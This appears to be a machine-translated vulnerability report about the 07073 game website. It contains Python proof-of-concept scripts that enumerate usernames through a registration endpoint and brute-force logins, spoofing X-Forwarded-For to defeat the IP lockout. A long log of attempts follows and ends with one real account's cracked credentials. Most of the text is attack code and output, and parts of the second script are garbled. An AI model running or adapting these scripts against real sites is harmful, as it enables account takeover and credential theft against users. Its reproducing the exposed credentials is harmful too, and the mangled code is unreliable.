Bypass 07073waf to traverse users and hit the database (with poc)

Bypass 07073waf to traverse users and hit the database (with poc)

07073 game website waf design defects can cause bypassing. interfaces can traverse users and hit libraries.
Appendix Verification poc

1. Registration interface brute-force user running

Data display:

Admin00

Admin000

Admin0000

Admin0001

Admin0002

Admin001

Admin0011

Admin002

Admin0025

Admin003

Admin0032

Admin004

Admin005

Admin0052

Admin0060

Admin007

Admin0076

Admin0077

Admin008

Admin009

Admin0095

Admin01

Admin0101

Admin0108

Admin0123

Admin0203

Admin021

Admin0216

Admin0225

Admin023



After a simple run, it stops. If you are interested, you can continue running.

Now poc is provided:

1 #! /usr/bin/env python  2   3 # encoding:utf-8  4 import urllib2  5 import socket  6   7 headers = {  8         'Host':' me.07073.com',  9         'User-Agent':' Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:37.0) Gecko/20100101 Firefox/37.0', 10         'Accept':' text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01', 11         'Accept-Language':' zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', 12         'Accept-Encoding':' deflate', 13         'X-Requested-With':' XMLHttpRequest', 14         'Referer':' http://me.07073.com/center/', 15         'Connection':' keep-alive' 16         } 17  18 data = "Username=admin" 19  20 def find(user): 21     try: 22         url = "http://me.07073.com/center/regUsername" 23         resquest = urllib2.Request(url,data+user,headers) 24         content = urllib2.urlopen(resquest).readlines() 25         if content[0] == '0': 26             print "admin"+user 27     except socket.error: 28         pass 29  30 for i1 in range(10): 31     for i2 in range(10): 32         find(str(i1)+str(i2)) 33         for i3 in range(10): 34             find(str(i1)+str(i2)+str(i3)) 35             for i4 in range(10): 36                 find(str(i1)+str(i2)+str(i3)+str(i4))

Now that the user has a dictionary or a social engineering database, he can run the password. No, why is there no user name or password in the login request?

Take a closer look, the user name and password are encrypted using js and then added to the url. However, the programmer provides a decryption algorithm, and the encryption written by the developer is not obfuscated or rotated, obviously, there is no deep cryptographic skills. If you don't talk about it, go to the Code:

Call your encryption algorithm to encrypt the password and user name, and add it to the url to continue cracking.

Burp running



Run

Run

Run

No, the ip address is blocked, and the password is verified only twice. The returned value is:

Var login_result = {"stauts": 0, "block": 1, "ip": "127.0.0.1 "}



Try to add X-Forwarded-for and find that this is the first time. Try again or be blocked,

Therefore, the ip address in the background is taken from X-Forwarded-for, and the number of Logon errors to each ip address is 3 times, and the account, password, and waf are all resolved, the trojan hasn't been verified yet. Come and run the poc:
 

1 #! /Usr/bin/env python 2 # encoding: UTF-8 3 4 import sys 5 import urllib2 6 import re 7 # use as: python 07073.py userlist.txt password.txt 8 #9 result = re. compile ("stauts \": 1 ") 10 print" use userlist file: "+ sys. argv [1] + "password file:" + sys. argv [2] 11 # load the username file 12 userlist = open (sys. argv [1], "r "). readlines () 13 # load the password list 14 wordlist = open (sys. argv [2], "r "). readlines () 15 16 headers = {17 'host': 'metric7073.com ', 18 'user-agent': 'mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv: 37.0) Gecko/20100101 Firefox/37.0 ', 19 'accept': 'text/javascript, application/javascript, application/ecmascript, application/x-ecmascript ,*/*; q = 0.01 ', 20' Accept-Language': 'zh-CN, zh; q = 0.8, en-US; q = 0.5, en; q = 0.3 ', 21 'Accept-encoding': 'release', 22 'x-Requested-with': 'xmlprequest ', 23 'Referer ':' http://me.07073.com/center/ ', 24 'connection': 'Keep-alive' 25} 26 ip = 0 27 for user in userlist: 28 for word in wordlist: 29 user = user. replace ("\ n", "") 30 user = user. replace ("\ r", "") 31 word = word. replace ("\ n", "") 32 word = word. replace ("\ r", "") 33 headers ['x-Forwarded-For '] = "127.0.0. "+ str (ip) 34 url =" http://me.07073.com/service/jsonLogin_/ "+ User +"/"+ word +"/1/r268 "35 print url 36 request = urllib2.Request (url," ", headers) 37 response = urllib2.urlopen (request) 38 if len (result. findall (response. read ()> 0: 39 print "user:" + user + "password:" + word 40 break 41 ip = ip + 1 ~

Verification record:

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTEyMzQ1Ng__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2YQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTIwMTMxNA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTExMTEx/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d29haW5pMTMxNA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXExMjM0NTY_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MDAwMDAw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MXFhejJ3c3g_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MXEydzNlNHI_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXdlMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/Nzc1ODUyMQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzcXdl/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTEyMzEyMw__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2YWE_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d29haW5pNTIw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d29haW5p/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTAwMjAw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTMxNDUyMA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d29haW5pMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzMzIx/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cTEyMzQ1Ng__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2Nzg5/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2Nzg5YQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTIxMTMxNA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXNkMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTEyMzQ1Njc4OQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/ejEyMzQ1Ng__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXNkMTIzNDU2/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTUyMDEzMTQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWExMjM0NTY_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/emhhbmcxMjM_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXB0eDQ4Njk_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzMTIzYQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MXEydzNlNHI1dA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MXFhenhzdzI_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTIwMTMxNGE_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MXEydzNl/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWluaTEzMTQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MzE0MTU5MjY_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cTF3MmUzcjQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2cXE_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d29haW5pNTIx/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNHF3ZXI_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTExMTExMQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTIwNTIw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/aWxvdmV5b3U_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWJjMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTEwMTEw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTExMTExYQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2YWJj/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/dzEyMzQ1Ng__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/Nzc1ODI1OA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzcXdlYXNk/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTU5NzUz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXdlcjEyMzQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTAwMDAwMA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXExMjMxMjM_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/enhjMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNjU0/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWJjMTIzNDU2/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2cQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXE1MjAxMzE0/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzNDU2Nzg_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MDAwMDAwYQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NDU2ODUy/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXMxMjM0NTY_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTMxNDUyMQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTEyMjMz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTIxNTIx/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cWF6d3N4MTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/enhjMTIzNDU2/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWJjZDEyMzQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXNkYXNk/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NjY2NjY2/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/bG92ZTEzMTQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/UUFaMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWFhMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cTF3MmUz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YWFhYWFh/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YTEyMzMyMQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTIzMDAw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTExMTExMTE_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTJxd2Fzeng_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTg0NTIwMTMxNA__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/czEyMzQ1Ng__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/bmloYW8xMjM_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/Y2FvbmltYTEyMw__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/enhjdmJubTEyMw__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/d2FuZzEyMw__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTU5MzU3/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MUEyQjNDNEQ_/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXNkYXNkMTIz/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NTg0NTIw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/NzUzOTUx/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTQ3MjU4/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTEyMzU4MTMyMQ__/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/MTEwMTIw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/cXExMzE0NTIw/1/r268

Http://me.07073.com/service/jsonLogin_/YWRtaW4zMjIz/YXNkZmdo/1/r268

User: YWRtaW4zMjIz password: YXNkZmdo



I won't try the passwords of other accounts one by one, so I can prove the problem.

I wrote several poc files and decrypted them again. Can I add 20 rank to python and js files?

Solution:

1. Modify waf Policy

2. Restrict the query interface